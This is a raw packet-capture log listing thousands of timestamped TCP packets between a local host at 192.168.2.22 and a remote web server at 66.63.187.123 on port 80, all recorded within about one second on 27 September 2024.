                                                                                                            Sep 27, 2024 16:00:38.602749109 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.602760077 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.602771997 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.602778912 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.602782011 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.602792978 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.602796078 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.602808952 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.602823973 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603003979 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603013992 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603024960 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603049040 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603060007 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603060961 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603072882 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603076935 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603085995 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603092909 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603110075 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603130102 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603477001 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603550911 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603580952 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603591919 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603621960 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603637934 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603773117 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603784084 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603795052 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603805065 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603813887 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603816986 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603827953 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603832960 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.603842020 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603856087 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.603868961 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604132891 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604144096 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604186058 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604276896 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604285955 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604299068 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604314089 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604327917 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604461908 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604473114 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604482889 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604517937 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604682922 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604692936 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604702950 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604712963 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604723930 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604738951 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604919910 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604937077 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604947090 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604958057 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.604981899 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.604995012 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.605159998 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.605195999 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.605207920 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.605218887 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.605240107 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.605254889 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.606724977 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606750965 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606761932 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606816053 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.606918097 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606929064 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606940985 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606952906 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.606952906 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.606966972 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.606980085 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.606992960 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.607141018 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.607151031 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.607162952 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.607180119 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.607192039 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.657088041 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657114983 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657128096 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657224894 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.657257080 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657269955 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657283068 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657295942 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.657399893 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.657399893 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.657399893 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.657959938 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658015966 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658025980 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658061981 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.658076048 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.658077002 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658155918 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658168077 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658179998 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658196926 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.658216953 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.658334970 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658345938 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.658375025 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.658390999 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.741746902 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741774082 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741786003 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741796970 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741807938 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741817951 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.741831064 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742002964 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742075920 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742089033 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742100000 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742111921 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742132902 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742156982 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742310047 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742342949 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742355108 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742366076 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742378950 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742388964 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742398977 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742413044 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742615938 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742664099 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742682934 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742722034 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742798090 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742808104 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742819071 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742830038 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.742835999 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742855072 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742855072 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.742866039 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743074894 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743087053 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743097067 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743108034 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743118048 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743127108 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743144035 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743153095 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743438959 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743449926 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743459940 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743470907 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743494034 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743510008 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743705034 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743716955 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743726969 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743746042 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743752003 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743758917 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743762016 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743769884 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743781090 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743782043 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743792057 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743792057 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743804932 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743813038 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743813038 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743817091 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.743829012 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743840933 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743861914 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.743906021 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744560957 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744573116 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744584084 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744594097 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744604111 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744611025 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744616032 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744621038 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744627953 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744637966 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744640112 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744649887 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744652033 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744663000 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744663000 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744674921 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744680882 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744689941 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.744713068 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744720936 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.744754076 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745474100 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745486975 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745496988 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745507956 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745517969 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745529890 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745539904 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745546103 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745551109 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745563030 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745570898 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745570898 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745574951 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745587111 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745589018 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745589018 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745599031 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745608091 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745610952 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745623112 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.745625019 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745636940 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745646954 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745665073 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.745712996 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.746253014 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.746264935 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.746273994 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.746285915 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.746294975 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.746305943 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.746305943 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.746323109 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.752909899 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.752962112 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.752971888 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753019094 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753098965 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753110886 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753122091 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753133059 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753144026 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753160000 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753170013 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753412008 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753422022 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753432989 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753444910 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753454924 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753458977 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753474951 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753484011 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753695011 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753742933 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.753774881 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753784895 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.753823996 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.802587986 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.802623987 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.802637100 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.802723885 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.905514002 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905534029 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905544996 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905630112 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905627966 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.905641079 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905653000 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905666113 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.905674934 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.905694008 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.905704021 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906075954 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906086922 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906097889 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906109095 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906122923 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906126022 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906138897 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906141996 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906152010 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906160116 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906163931 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906172991 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906177044 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906188011 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906204939 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906819105 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906831980 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906847000 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906857967 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906867027 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906868935 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906879902 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906881094 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906893015 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906896114 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906904936 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906914949 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906915903 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906928062 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906929016 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906941891 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.906946898 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906961918 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.906979084 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.907188892 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.907738924 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907752037 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907762051 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907773018 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907785892 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907795906 CEST4916680192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:38.907797098 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907809019 CEST804916666.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:38.907810926 CEST4916680192.168.2.2266.63.187.123
